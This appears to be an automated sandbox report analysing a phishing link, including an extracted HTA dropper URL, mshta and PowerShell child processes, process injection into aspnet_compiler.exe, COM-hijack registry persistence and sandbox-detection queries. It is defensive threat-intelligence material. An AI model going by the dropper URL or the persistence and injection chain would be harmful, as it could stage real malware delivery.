hxxps://avme-zc1[.]maillist-manage[.]com[.]au/click[.]zc?m=1&mrd=126605c9d3861db&od=3z82fd09666148feea4ff0cb2c316fa9c0b0a11d15b6b4da3f345d26d28a832d29&linkDgs=126605c9cdd4033&repDgs=126605c9d38cc06

Analysis

max time kernel
137s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
26-09-2022 14:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://avme-zc1.maillist-manage.com.au/click.zc?m=1&mrd=126605c9d3861db&od=3z82fd09666148feea4ff0cb2c316fa9c0b0a11d15b6b4da3f345d26d28a832d29&linkDgs=126605c9cdd4033&repDgs=126605c9d38cc06

Score

10^/10

persistence

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://vigorous-wilson.91-212-52-180.plesk.page/Bypass.txt

Signatures

Process spawned unexpected child process 6 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

Mshta.EXEPOWERSHELL.exeMshta.EXEPOWERSHELL.exePOWERSHELL.exePOWERSHELL.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4736	4808	Mshta.EXE
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	224	4808	POWERSHELL.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3960	4808	Mshta.EXE
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2748	4808	POWERSHELL.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4736	4808	POWERSHELL.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4576	4808	POWERSHELL.exe

Blocklisted process makes network request 6 IoCs

Processes:

Mshta.EXEPOWERSHELL.exeMshta.EXEPOWERSHELL.exe

flow pid process

88 4736 Mshta.EXE
90 4736 Mshta.EXE
92 4736 Mshta.EXE
93 224 POWERSHELL.exe
99 3960 Mshta.EXE
100 2748 POWERSHELL.exe

flow	pid	process
88	4736	Mshta.EXE
90	4736	Mshta.EXE
92	4736	Mshta.EXE
93	224	POWERSHELL.exe
99	3960	Mshta.EXE
100	2748	POWERSHELL.exe

Registers COM server for autorun 1 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll"	reg.exe

Enumerates connected drives 3 TTPs 4 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

chrome.exeWScript.exeCScript.exeNotepad.exe

description	ioc	process
File opened (read-only)	\??\E:	chrome.exe
File opened (read-only)	\??\E:	WScript.exe
File opened (read-only)	\??\E:	CScript.exe
File opened (read-only)	\??\E:	Notepad.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process	target process
PID 4136 set thread context of 4760	4136	powershell.exe	aspnet_compiler.exe
PID 2272 set thread context of 2164	2272	powershell.exe	aspnet_compiler.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000003	chrome.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\HardwareID	chrome.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Service	chrome.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies registry class 57 IoCs

Processes:

Notepad.exereg.exereg.exereg.exereg.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2"	Notepad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	Notepad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	Notepad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Notepad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Notepad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	Notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Notepad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll"	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe11000000e57f3ac07eaed8013eaa4fc37eaed801333983c47eaed80114000000	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings	Notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Notepad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	Notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	Notepad.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32	reg.exe

Modifies registry key 1 TTPs 4 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exe

pid process

3428 reg.exe
2820 reg.exe
4916 reg.exe
4180 reg.exe

pid	process
3428	reg.exe
2820	reg.exe
4916	reg.exe
4180	reg.exe

Suspicious behavior: EnumeratesProcesses 44 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exePOWERSHELL.exechrome.exePOWERSHELL.exechrome.exepowershell.exePOWERSHELL.exepowershell.exepowershell.exePOWERSHELL.exepowershell.exechrome.exe

pid	process
3764	chrome.exe
3764	chrome.exe
3352	chrome.exe
3352	chrome.exe
1496	chrome.exe
1496	chrome.exe
3268	chrome.exe
3268	chrome.exe
2416	chrome.exe
2416	chrome.exe
2464	chrome.exe
2464	chrome.exe
224	POWERSHELL.exe
224	POWERSHELL.exe
224	POWERSHELL.exe
4444	chrome.exe
4444	chrome.exe
2748	POWERSHELL.exe
2748	POWERSHELL.exe
2748	POWERSHELL.exe
4360	chrome.exe
4360	chrome.exe
3984	powershell.exe
3984	powershell.exe
3984	powershell.exe
4736	POWERSHELL.exe
4736	POWERSHELL.exe
4736	POWERSHELL.exe
4136	powershell.exe
4136	powershell.exe
4136	powershell.exe
1668	powershell.exe
1668	powershell.exe
1668	powershell.exe
4576	POWERSHELL.exe
4576	POWERSHELL.exe
4576	POWERSHELL.exe
2272	powershell.exe
2272	powershell.exe
2272	powershell.exe
3392	chrome.exe
3392	chrome.exe
3392	chrome.exe
3392	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

chrome.exe

pid process

3352 chrome.exe
3352 chrome.exe
3352 chrome.exe
3352 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exePOWERSHELL.exePOWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exe

description	pid	process
Token: SeManageVolumePrivilege	3352	chrome.exe
Token: SeManageVolumePrivilege	3352	chrome.exe
Token: SeDebugPrivilege	224	POWERSHELL.exe
Token: SeDebugPrivilege	2748	POWERSHELL.exe
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeDebugPrivilege	4736	POWERSHELL.exe
Token: SeIncreaseQuotaPrivilege	3984	powershell.exe
Token: SeSecurityPrivilege	3984	powershell.exe
Token: SeTakeOwnershipPrivilege	3984	powershell.exe
Token: SeLoadDriverPrivilege	3984	powershell.exe
Token: SeSystemProfilePrivilege	3984	powershell.exe
Token: SeSystemtimePrivilege	3984	powershell.exe
Token: SeProfSingleProcessPrivilege	3984	powershell.exe
Token: SeIncBasePriorityPrivilege	3984	powershell.exe
Token: SeCreatePagefilePrivilege	3984	powershell.exe
Token: SeBackupPrivilege	3984	powershell.exe
Token: SeRestorePrivilege	3984	powershell.exe
Token: SeShutdownPrivilege	3984	powershell.exe
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeSystemEnvironmentPrivilege	3984	powershell.exe
Token: SeRemoteShutdownPrivilege	3984	powershell.exe
Token: SeUndockPrivilege	3984	powershell.exe
Token: SeManageVolumePrivilege	3984	powershell.exe
Token: 33	3984	powershell.exe
Token: 34	3984	powershell.exe
Token: 35	3984	powershell.exe
Token: 36	3984	powershell.exe
Token: SeDebugPrivilege	4136	powershell.exe
Token: SeIncreaseQuotaPrivilege	3984	powershell.exe
Token: SeSecurityPrivilege	3984	powershell.exe
Token: SeTakeOwnershipPrivilege	3984	powershell.exe
Token: SeLoadDriverPrivilege	3984	powershell.exe
Token: SeSystemProfilePrivilege	3984	powershell.exe
Token: SeSystemtimePrivilege	3984	powershell.exe
Token: SeProfSingleProcessPrivilege	3984	powershell.exe
Token: SeIncBasePriorityPrivilege	3984	powershell.exe
Token: SeCreatePagefilePrivilege	3984	powershell.exe
Token: SeBackupPrivilege	3984	powershell.exe
Token: SeRestorePrivilege	3984	powershell.exe
Token: SeShutdownPrivilege	3984	powershell.exe
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeSystemEnvironmentPrivilege	3984	powershell.exe
Token: SeRemoteShutdownPrivilege	3984	powershell.exe
Token: SeUndockPrivilege	3984	powershell.exe
Token: SeManageVolumePrivilege	3984	powershell.exe
Token: 33	3984	powershell.exe
Token: 34	3984	powershell.exe
Token: 35	3984	powershell.exe
Token: 36	3984	powershell.exe
Token: SeIncreaseQuotaPrivilege	3984	powershell.exe
Token: SeSecurityPrivilege	3984	powershell.exe
Token: SeTakeOwnershipPrivilege	3984	powershell.exe
Token: SeLoadDriverPrivilege	3984	powershell.exe
Token: SeSystemProfilePrivilege	3984	powershell.exe
Token: SeSystemtimePrivilege	3984	powershell.exe
Token: SeProfSingleProcessPrivilege	3984	powershell.exe
Token: SeIncBasePriorityPrivilege	3984	powershell.exe
Token: SeCreatePagefilePrivilege	3984	powershell.exe
Token: SeBackupPrivilege	3984	powershell.exe
Token: SeRestorePrivilege	3984	powershell.exe
Token: SeShutdownPrivilege	3984	powershell.exe
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeSystemEnvironmentPrivilege	3984	powershell.exe
Token: SeRemoteShutdownPrivilege	3984	powershell.exe

Suspicious use of FindShellTrayWindow 34 IoCs

Processes:

chrome.exe

pid	process
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe
3352	chrome.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Notepad.exe

pid process

4656 Notepad.exe
4656 Notepad.exe

pid	process
4656	Notepad.exe
4656	Notepad.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 3352 wrote to memory of 2112	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 2112	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3872	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3764	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 3764	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 4928	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 4928	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 4928	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 4928	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 4928	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 4928	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 4928	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 4928	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 4928	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 4928	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 4928	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 4928	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 4928	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 4928	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 4928	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 4928	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 4928	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 4928	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 4928	3352	chrome.exe	chrome.exe
PID 3352 wrote to memory of 4928	3352	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://avme-zc1.maillist-manage.com.au/click.zc?m=1&mrd=126605c9d3861db&od=3z82fd09666148feea4ff0cb2c316fa9c0b0a11d15b6b4da3f345d26d28a832d29&linkDgs=126605c9cdd4033&repDgs=126605c9d38cc06
1⤵
- Enumerates connected drives
- Checks SCSI registry key(s)
- Enumerates system info in registry
